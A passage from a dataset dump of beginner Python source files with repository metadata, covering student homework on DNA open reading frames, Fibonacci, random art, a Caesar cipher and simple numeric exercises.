(find_all_ORFs(get_reverse_complement(dna)))\n\ndef find_all_ORFs_both_strands_unit_tests():\n    \"\"\" Unit tests for the find_all_ORFs_both_strands function \"\"\"\n    print \"input: CTA, \"+\"output: \"+ \",\".join(find_all_ORFs_both_strands(\"CTA\"))+\", actual output: CTA,TA,A,AG,G\"\n    print \"input: GTCACTTAGGGTTTT, \"+\"output: \"+\",\".join(find_all_ORFs_both_strands(\"GTCACTTAGGGTTTT\"))+\", actual output: GTCACT,GGTTTT,TCACTTAGGGTTTT,CACTTAGGGTTTT,AAAACCCTAAGTGAC,AAACCC,GTGAC,AACCCTAAG\"\n    print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+\",\".join(find_all_ORFs_both_strands(\"AAATTTTATAATGGGTGAAGTTAG\"))+\", actual output: AAATTTTATAATGGG,AGT,AATTTTATAATGGGTGAAGTTAG,ATTTTA,TGGGTGAAGTTAG,CTAACTTCACCCATTATAAAATTT,CTTCACCCATTA,AATTT,AACTTCACCCATTATAAAATTT\"\n    print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+ \",\".join(find_all_ORFs_both_strands(\"TATATGGAGGATAATAGTTGATAATAG\"))+\", actual output: TATATGGAGGATAATAGT,ATATGGAGGATAATAGTTGATAATAG,TATGGAGGA,TTGATAATAG,CTATTATCAACTATTATCCTCCATATA,TATTATCAACTATTATCCTCCATATA,ATTATCAACTATTATCCTCCATATA\"\n\n\ndef longest_ORF(dna):\n    \"\"\" Finds the longest ORF on both strands of the specified DNA and returns it\n    as a string\"\"\"\n    orfs = find_all_ORFs_both_strands(dna)\n    maxorf = orfs[0]\n    for s in orfs:\n        if len(s)>len(maxorf):\n            maxorf=s\n    return maxorf\n\ndef longest_ORF_unit_tests():\n    \"\"\" Unit tests for the longest_ORF function \"\"\"\n\n    # YOUR IMPLEMENTATION HERE\n\ndef longest_ORF_noncoding(dna, num_trials):\n    \"\"\" Computes the maximum length of the longest ORF over num_trials shuffles\n    of the specified DNA sequence\n    \n    dna: a DNA sequence\n    num_trials: the number of random shuffles\n    returns: the maximum length longest ORF \"\"\"\n    dnal = list(dna)\n    maxorf = 0\n    for i in range(num_trials):\n        shuffle(dnal)\n        orf = len(longest_ORF(collapse(dnal)))\n        if maxorf<orf:\n            maxorf = orf\n    return maxorf\n\ndef gene_finder(dna, threshold):\n    \"\"\" Returns the amino acid sequences coded by all genes that have an ORF\n    larger than the specified threshold.\n    \n    dna: a DNA sequence\n    threshold: the minimum length of the ORF for it to be considered a valid\n    gene.\n    returns: a list of all amino acid sequences whose ORFs meet the minimum\n    length 
specified.\n \"\"\"\n orfs = find_all_ORFs_both_strands(dna)\n orfs = [i for i in orfs if len(i)>threshold]\n orfs = [coding_strand_to_AA(i) for i in orfs]\n return orfs\n \nsampledna = load_seq(\"./data/X73525.fa\")\nsamplethresh = longest_ORF_noncoding(sampledna,1500)\nprint samplethresh\nprint gene_finder(sampledna, samplethresh)\n"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.5142857432365417,
"avg_line_length": 15.84000015258789,
"blob_id": "ca62c3589b11de7a3a22fde2dbc8a51eb561c5b9",
"content_id": "70a875e22b576a6328e8a8f85546a6bd53a5bcfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 25,
"path": "/fib.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 15:01:04 2014\n\n@author: dcelik\n\"\"\"\n\ndef fib(n):\n if n==0 or n==1:\n return n\n return fib(n-1)+fib(n-2)\n \nprint [fib(i) for i in range(1,10)]\n\nfibdict={}\ndef fibonacci(n,d={}):\n if n==0 or n==1:\n return n\n elif n in d:\n return d[n]\n else:\n x = fibonacci(n-2)+fibonacci(n-1)\n d[n]=x\n return x\nprint fibonacci(100)"
},
{
"alpha_fraction": 0.5111402273178101,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 22.875,
"blob_id": "9b17a7efc68d8401fe7d51b3e103e2baf480199a",
"content_id": "8f42cd2202336dd45f648b36739a430439f3900d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 763,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 32,
"path": "/quizzes/quiz2.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 13:38:17 2014\n\n@author: dcelik\n\"\"\"\ndef filter_out_negative_numbers(nums):\n newl = []\n for i in nums:\n if i>=0:\n newl.append(i)\n return newl\n \nprint filter_out_negative_numbers([-2,5,10,-100,5])\nprint filter_out_negative_numbers([-1,1,2,-2,-100,50,70,20,-1,-8,-9])\n\ndef filter_out_negative_numbers_SHORT(nums):\n return [i for i in nums if i>=0]\n\nprint filter_out_negative_numbers_SHORT([-2,5,10,-100,5])\nprint filter_out_negative_numbers_SHORT([-1,1,2,-2,-100,50,70,20,-1,-8,-9])\n\nprint range(0,1)\n\ndef sum_of_squares(n):\n if n==0:\n return 0\n return (n**2) + sum_of_squares(n-1) \n \nnlist = [i for i in range(0,30)] \ny = [sum_of_squares(i) for i in nlist]\nprint y"
},
{
"alpha_fraction": 0.5749797224998474,
"alphanum_fraction": 0.6025398373603821,
"avg_line_length": 32.297298431396484,
"blob_id": "17bbf74999d9dc63732445712bdc517ff0a0d28f",
"content_id": "31e3fba0cdb5faf13fefdff38e4a4381edf032eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3701,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 111,
"path": "/hw4/random_art.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:34:57 2014\n\n@author: pruvolo\n\"\"\"\n\n# you do not have to use these particular modules, but they may help\nfrom random import randint\nimport Image\nimport math\n\ndef build_random_function(min_depth, max_depth):\n \"\"\" Creates and returns a random function, with a recursive depth betwene min_depth \n and max_depth. It returns a nested list filled with strings representing the\n desired functions.\n \"\"\"\n num = randint(1,5)\n if min_depth<=0 and max_depth>0:\n if randint(0,10)>5:\n max_depth=0\n if max_depth==0:\n num = randint(6,7) \n if num==1:\n return [\"prod\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==2:\n return [\"cos_pi\",build_random_function(min_depth-1,max_depth-1)]\n if num==3:\n return [\"sin_pi\",build_random_function(min_depth-1,max_depth-1)]\n if num==4:\n return [\"ave\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==5:\n return [\"sin_xy\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==6:\n return [\"x\"]\n if num==7:\n return [\"y\"]\n \ndef prod(a,b):\n return a*b\n\ndef cos_pi(a):\n return math.cos(math.pi*a)\n \ndef sin_pi(a):\n return math.sin(math.pi*a)\n \ndef sin_xy(a,b):\n return math.sin(math.pi*a*b*randint(1,10))\n\ndef x(a,b):\n return a\n\ndef y(a,b):\n return b\n \ndef ave(a,b):\n return (a+b)/2.0\n\ndef evaluate_random_function(f, x, y):\n \"\"\" Takes a function f and translates it into a series of recursive method calls\n which are then evaluated with the given x and y values.\n \"\"\"\n str = f[0]\n if str=='ave':\n return ave(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='prod':\n return prod(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='sin_xy':\n return sin_xy(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='cos_pi':\n return cos_pi(evaluate_random_function(f[1],x,y))\n if str=='sin_pi':\n return sin_pi(evaluate_random_function(f[1],x,y))\n if str=='x':\n return x\n if str=='y':\n return y\n\n \n \ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, output_interval_end):\n \"\"\" Maps the input value that is in the interval [input_interval_start, input_interval_end]\n to the output interval [output_interval_start, output_interval_end]. The mapping\n is an affine one (i.e. output = input*c + b).\n \"\"\"\n return(output_interval_end-output_interval_start)*float((val-input_interval_start))/float((input_interval_end-input_interval_start))+output_interval_start\n\ndef main():\n red = build_random_function(4,17)\n green = build_random_function(3,18)\n blue = build_random_function(2,20)\n im = Image.new(\"RGB\",(350,350))\n horz,vert = im.size\n pixels = im.load()\n for i in xrange(horz):\n x = remap_interval(i,0,horz,-1,1)\n for j in xrange(vert):\n y = remap_interval(j,0,horz,-1,1)\n r = evaluate_random_function(red,x,y)\n g = evaluate_random_function(green,x,y)\n b = evaluate_random_function(blue,x,y)\n r = int(remap_interval(r,-1,1,0,255))\n g = int(remap_interval(g,-1,1,0,255))\n b = int(remap_interval(b,-1,1,0,255))\n pixels[i,j] = (r,g,b)\n \n im.save(\"Deniz9\",\"png\")\n \nif __name__==\"__main__\":\n main() "
},
{
"alpha_fraction": 0.5602940917015076,
"alphanum_fraction": 0.5852941274642944,
"avg_line_length": 26.040000915527344,
"blob_id": "c23da378d2603c5bb78c89c81a08ebd3188cc3f7",
"content_id": "f027a7b80c49b84abc193501f8d54680c6814310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 25,
"path": "/hw2/fermat.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- co<ding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 3 03:23:32 2014\n\n@author: dcelik\n\"\"\"\n\ndef fermat(a,b,c,n):\n part1 = a**n + b**n\n part2 = c**n\n if n<=2:\n print \"n must be greater than 2!\"\n elif a**n + b**n == c**n:\n print \"Holy Smokes, Fermat was Wrong\"\n else:\n print \"No, that doesn't work.\"\n\ndef fermatcheck():\n print \"Input a,b,c, and n to check if they satisfy fermats last equation!\"\n ainp = int(raw_input(\"Please input a\\n\"))\n binp = int(raw_input(\"Please input b\\n\"))\n cinp = int(raw_input(\"Please input c\\n\"))\n ninp = int(raw_input(\"Please input an n greater than 2\\n\"))\n fermat(ainp,binp,cinp,ninp)\nfermatcheck()\n "
},
{
"alpha_fraction": 0.5091575384140015,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 18.571428298950195,
"blob_id": "fa7d953e1139ac74d899cf7450a2cdf9c93ab399",
"content_id": "729652a355a6adbd41aa7c31aa4756bb0ca90bbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 14,
"path": "/hw2/compare.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 3 03:57:59 2014\n\n@author: dcelik\n\"\"\"\n\ndef compare(x,y):\n if x>y:\n return 1\n if x==y:\n return 0\n return -1\nprint \"Compare returned \"+str(compare(raw_input(\"Give me an X!\\n\"),raw_input(\"Give me a Y!\\n\")))"
},
{
"alpha_fraction": 0.38743454217910767,
"alphanum_fraction": 0.4659685790538788,
"avg_line_length": 15,
"blob_id": "3802e94ff309bd30d38314a6ad85023a2e9f1fec",
"content_id": "f4d0def0f5d491c0c0bd251cf74314eb73c25dfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 12,
"path": "/hw2/grid.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 30 15:05:09 2014\n\n@author: dcelik\n\"\"\"\n\ndef grid():\n plus = '+----+----+\\n'\n vert = '| | |\\n'\n print (plus+(vert*4))*2+plus\ngrid()"
}
] | 8 |
glamboyosa/historical-yield-data
|
https://github.com/glamboyosa/historical-yield-data
|
4249db822e66ba4c60bf06ce5debbd8605c97cb5
|
47b41a70f658140f16e2f24c2c3e09ea2a4e40ff
|
033700710d7cf8bfccdb9b2e3a753c7e8b5f749e
|
refs/heads/master
| 2021-02-27T06:58:32.558497 | 2020-03-07T07:49:43 | 2020-03-07T07:49:43 | 245,590,362 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8217821717262268,
"alphanum_fraction": 0.8217821717262268,
"avg_line_length": 32.66666793823242,
"blob_id": "6d6f65cdd50953919b130de7bd1ffa634df8a9c1",
"content_id": "c6c379bd1b34f2f9b4da5288910b0fb9e6adb6ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 3,
"path": "/readme.md",
"repo_name": "glamboyosa/historical-yield-data",
"src_encoding": "UTF-8",
"text": "# Historical Crop Yield Data\n\nweb scraper collecting historical crop yield for my final year project\n"
},
{
"alpha_fraction": 0.6557132005691528,
"alphanum_fraction": 0.6848394274711609,
"avg_line_length": 28.10869598388672,
"blob_id": "6a59d4fd83dd18115f31eea59495165c19685c99",
"content_id": "0e710552e7286a890d9bef3041578494e6e3bb08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 46,
"path": "/scraper.py",
"repo_name": "glamboyosa/historical-yield-data",
"src_encoding": "UTF-8",
"text": "import pandas\nfrom pandas import Series, DataFrame\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nURLS = [\n 'http://www.factfish.com/statistic-country/nigeria/maize%2C%20total%2C%20%20production%20quantity'\n]\ndictionary = ''\nyear_name = []\nyear = []\nvalue_name = []\nvalue = []\nresults_3 = None\nfor url in URLS:\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n results = soup.find_all('th')\n results_3 = soup.find_all(\n 'table', class_='table table-striped table-bordered factfish-drill-down-data-table')[0].text.split()[slice(2, 115)]\n # print(results_3)\n year_name.append(results[0].text)\n value_name.append(results[1].text)\n\n # if resultest == None:\n # print('Okay this is how we will do itt')\n # print(year_name)\n # print(value_name)\n# print(results_3)\nyear = results_3[slice(0, 115, 2)][slice(1, 57)]\nprint(year_name)\nprint(len(year))\nvalue = results_3[slice(1, 115, 2)]\nprint(value_name)\nprint(len(value))\ndictionary = {\n year_name[0]: year,\n value_name[0]: value\n}\nprint(dictionary)\ndf = DataFrame(dictionary)\ndf.to_csv(r'C:\\Users\\Osa\\Documents\\Crop Yield\\maize-yield.csv',\n index=None, header=True)\nprint(dictionary)\nprint(DataFrame(dictionary))\nprint(pandas.read_csv(r'C:\\Users\\Osa\\Documents\\Crop Yield\\maize-yield.csv'))\n"
}
] | 2 |
Yevgen32/Python
|
https://github.com/Yevgen32/Python
|
fff8a7b2bb9b6bd35590801aa01a5aad7cc96d64
|
ac38c5c67dee66d35c89cad0e8debd180272239d
|
27a936ad9d28c27ee5b90f82df648c79e015e723
|
refs/heads/master
| 2021-04-27T21:01:29.772856 | 2018-03-05T16:48:31 | 2018-03-05T16:48:31 | 122,392,884 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7010309100151062,
"alphanum_fraction": 0.7139175534248352,
"avg_line_length": 24.866666793823242,
"blob_id": "5b474202a9e7b5a653ec5e78810487ec12d77438",
"content_id": "2fd3af4fa53f8e4e8748a20642383d76fcae89a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 587,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 15,
"path": "/Practic/Tasks/24.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит количество дней,\n# указывает процент скидки и вводит сумму. Рассчитать прибыль, если за каждый день сумма увеличивается на 3 $ и затем применяется скидка, то есть итоговая сумма\n# еще увеличивается на данное число процентов.\n\nday = int(input(\"day:\"))\n\nproz = int(input(\"proz:\"))\n\nsum = int(input(\"sum:\"))\n\npoh = day * 3\n\nprib = poh + poh * (proz / 100)\n\nprint(prib)\n"
},
{
"alpha_fraction": 0.4556961953639984,
"alphanum_fraction": 0.5189873576164246,
"avg_line_length": 12.166666984558105,
"blob_id": "ce195538b56758330f02230d39f451287cf7ebb5",
"content_id": "d5123a1b40757efc824a9205caefbd02cef602f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 12,
"path": "/Practic/Tasks/86.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Для данного n найти сумму 1+2+3+...+n. Например, для n=10 ответ равен 55.\n\nn = int(input(\"n:\"))\n\ni = 0\n\ng = 0\n\nwhile i < n:\n i +=1\n g +=i\n print(g)\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.5855130553245544,
"avg_line_length": 29.9375,
"blob_id": "99ea4d00afad079c93deb281e5e39294c1e398a5",
"content_id": "a0529fa1efd8c2179d4510fa9fdbd481023de684",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 16,
"path": "/Practic/Tasks/69.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа - длины сторон треугольника. Найти площадь треугольника. Сделать проверку на существование треугольника (например, 1, 2, 3 - такого треугольника не существует). Проверить ответы можно здесь\n\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nif a + b > c and a + c > b and b + c > a:\n p = (a + b + c) /2\n print(\"p:\",p*2)\n s = (p * ( p - a ) * ( p - b ) * ( p - c ))**0.5\n print(\"s:\",s)\n print(\"true\")\nelse:\n\tprint(\"false\")\n\n\n"
},
{
"alpha_fraction": 0.4672435224056244,
"alphanum_fraction": 0.5414091348648071,
"avg_line_length": 34.173912048339844,
"blob_id": "ef44ef7a03e88262c7e6252148db2208d1c56583",
"content_id": "85ef68730554ae812587e6c9bb93dff08dd2e5e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 895,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 23,
"path": "/Practic/Tasks/65.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "4#Дано четырехзначное число. Переставьте местами цифры так, чтобы сначала оказались цифры, меньшие пяти.\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\n\nif digit_1 < 5:\n if digit_2 < 5:\n if digit_3 < 5:\n if digit_4 < 5:\n if digit_2 > digit_1 and digit_4 > digit_3:\n print(digit_1,digit_2,digit_3,digit_4)\n elif digit_2 > digit_1 and digit_3 > digit_4:\n print(digit_1,digit_2,digit_4,digit_3)\n elif digit_1 > digit_2 and digit_4 > digit_3:\n print(digit_2,digit_1,digit_3,digit_4)\n elif digit_1 > digit_2 and digit_3 > digit_4:\n print(digit_2,digit_1,digit_4,digit_3)\n"
},
{
"alpha_fraction": 0.5830815434455872,
"alphanum_fraction": 0.652567982673645,
"avg_line_length": 22.64285659790039,
"blob_id": "a56dfba9b85dba2b8726733e0fa92103c9754658",
"content_id": "9ad2c07cbbc6a21e3abd634b9e98b1566925e245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 14,
"path": "/Practic/Tasks/64.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Если оно читается слева направо и справа налево одинаково, то вывести yes, иначе no.\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nif digit_1 == digit_4 and digit_2 == digit_3:\n print(\"YES\")\nelse:\n print(\"NO\")\n"
},
{
"alpha_fraction": 0.4483568072319031,
"alphanum_fraction": 0.48122066259384155,
"avg_line_length": 22.61111068725586,
"blob_id": "7a103ac5e1bc94baf04d06c2021b035ea41845cd",
"content_id": "fe516a1bd144d354e28d446a97911e53b8a10dd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 18,
"path": "/Cryptology/Caesar_lab_1.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "arr1=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\narr2=[]\nfor i in range(len(arr1)):\n arr2.append(arr1[i])\nnumber=int(input(\"Key:\"))\nfor i in range(number):\n arr2.append(arr2[0])\n arr2.remove(arr2[0])\n\nmsg = input(\"text:\")\n\nmsgc = \"\"\nfor i in msg:\n for j in range(len(arr1)):\n if i == arr1[j]:\n msgc += arr2[j]\nprint(\"Crypt:\", msgc)\n\n"
},
{
"alpha_fraction": 0.6990881562232971,
"alphanum_fraction": 0.6990881562232971,
"avg_line_length": 28.909090042114258,
"blob_id": "dcd32d49883c39c5fad0bb20062253f68486aa44",
"content_id": "744920d7b22813d0d3cbbcc57cd981545380f02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 500,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 11,
"path": "/Practic/Tasks/70.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны целочисленные координаты трех вершин прямоугольника. стороны которого параллельны координатным осям. Найдите координаты его четвертой вершины (после проверки введенных данных на правильность).\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nif a == c:\n d = b\n print(a,b,c,d)\nelse:\n print(\"FALSE\")\n"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7213114500045776,
"avg_line_length": 16.428571701049805,
"blob_id": "1b0fde91b09d6750c00d04bb9fbcd5ba2778d0fa",
"content_id": "7e0fd97994c2c28ad9ef60d86981139a93dc90e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 195,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 7,
"path": "/Practic/Tasks/29.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Поменяйте местами значения двух переменных, не используя дополнительных переменных.\n\na = 3\nb = 2\na,b = b,a\n\nprint (a, b)\n"
},
{
"alpha_fraction": 0.6162790656089783,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 18.846153259277344,
"blob_id": "d0729def335476abe49af0a1b8baab9a4db5991e",
"content_id": "aad62a12c3281578043c6a9ae51ff591c345f842",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 359,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 13,
"path": "/Practic/Tasks/39.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два числа. Если первое число больше второго, то вывести yes, иначе поменять значения этих переменных и вывести их на экран\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > y:\n print(\"yes\")\nelse:\n buff = x\n x = y\n y = buff\n print(x,y)\n"
},
{
"alpha_fraction": 0.47711268067359924,
"alphanum_fraction": 0.5950704216957092,
"avg_line_length": 27.350000381469727,
"blob_id": "373eed04be7e0834c650990a474272fe63b99a31",
"content_id": "a6184c4f08dea723e6bef8d08bafe5c4afa2bb74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/Games/lucky ticket.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\ntotal1 = 0\ntotal2 = 1\nquantity = 0\nwhile total1 != total2:\n ticket = random.randint(100000, 999999)\n digit_1 = ticket // 100000\n digit_2 = ticket // 10000 % 10\n digit_3 = ticket // 1000 % 10\n digit_4 = ticket // 100 % 10\n digit_5 = ticket // 10 % 10\n digit_6 = ticket % 10\n total1 = digit_1 + digit_2 + digit_3\n total2 = digit_4 + digit_5 + digit_6\n if total1 == total2:\n print(\"Lucky you, ticket number\", ticket)\n else:\n print(\"Unlucky you, ticket number\", ticket)\n quantity += 1\nprint(quantity+1)\n\n"
},
{
"alpha_fraction": 0.6853147149085999,
"alphanum_fraction": 0.7027971744537354,
"avg_line_length": 16.875,
"blob_id": "690fbf2ff09caf5f1506e441b76ca9e89230c214",
"content_id": "79d480e2e8b8909fa35428131781699a7c20b7d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/Practic/Tasks/28.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит сумму вклада в банк и годовой процент.\n#Найдите сумму вклада через 5 лет\n#(рассмотреть два способа начисления процентов)\n\nsum = int(input('money:'))\n\nproz = float(input('proz:'))\n\nyear = 5;\n\nsum_proz = proz / 100 * sum\n\ntotal = sum_proz * year + sum\n\n\nprint(total)\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 27.799999237060547,
"blob_id": "7a38ef431e4acc46f19b68d8c0e6fbf2f74b2a3b",
"content_id": "21ac6e604434057d5307ea17ef24785d0023c56a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/Games/bones.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\ndie1 = random.randint(1, 6)\ndie2 = random.randint(1, 6)\ntotal = die1 + die2\nprint(\"bone1:\", die1, \"bone2:\", die2, \"total\", total)\n"
},
{
"alpha_fraction": 0.7534246444702148,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 28.200000762939453,
"blob_id": "0a4208ffab044dc7647c741b8fcb1e960e65aba1",
"content_id": "0ff33379cd3cfd104a45374b0c231a0090394112",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 5,
"path": "/Practic/Tasks/33.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите x−y√−−−−−−√, если x и y вводит пользователь.\n# Перед вычислением выполнить проверку на существование\n# квадратных корней.\n\nimport math\n"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 30.5,
"blob_id": "e98cb6fba1adae705f5361b38025258ff8bea5b7",
"content_id": "4346cf915a85738204959fe48dc71feca3d68148",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 4,
"path": "/Practic/Tasks/8.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения (a+4b)(a−3b)+a2 при a=2 и b=3. Ответ: -94\na = 2\nb = 3\nprint((a + 4 * b) * (a - 3 * b) + a * 2)\n"
},
{
"alpha_fraction": 0.5654951930046082,
"alphanum_fraction": 0.5942491888999939,
"avg_line_length": 27.454545974731445,
"blob_id": "c97baa71451c123563778478fc730a26dedeaebf",
"content_id": "546b5dd1d923ce7acb51e6e1d97a2f2232d0c57e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 11,
"path": "/Practic/Tasks/52.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четыре числа, если первые два числа больше 5, третье число делится на 6, четвертое число не делится на 3, то вывести yes, иначе no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nv = int(input(\"v:\"))\n\nif x > 5 and y > 5 and z % 6 == 0 and v % 3 != 0:\n print(\"yes\")\nelse:\n print(\"no\")\n"
},
{
"alpha_fraction": 0.570135772228241,
"alphanum_fraction": 0.6063348650932312,
"avg_line_length": 23.55555534362793,
"blob_id": "3f337566b9ff1f1f8c1d02cf7ba96762ef668001",
"content_id": "a1518776f5cb0bf9e8c66738bb91da771d44609f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 9,
"path": "/Practic/Tasks/35.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно меньше 7, то вывести Yes, если больше 10, то вывести No, если равно 9, то вывести Error.\n\nx = int(input(\"x:\"))\nif x < 7:\n print(\"Yes\")\nelif x > 10:\n print(\"No\")\nelif x == 9:\n print(\"Error\")\n"
},
{
"alpha_fraction": 0.5574468374252319,
"alphanum_fraction": 0.5744680762290955,
"avg_line_length": 20.363636016845703,
"blob_id": "8c13265aefe6041e1cf372bf944672a9887be329",
"content_id": "5a6e30897e1982ba256ed7320f917d7a85bbb150",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 83,
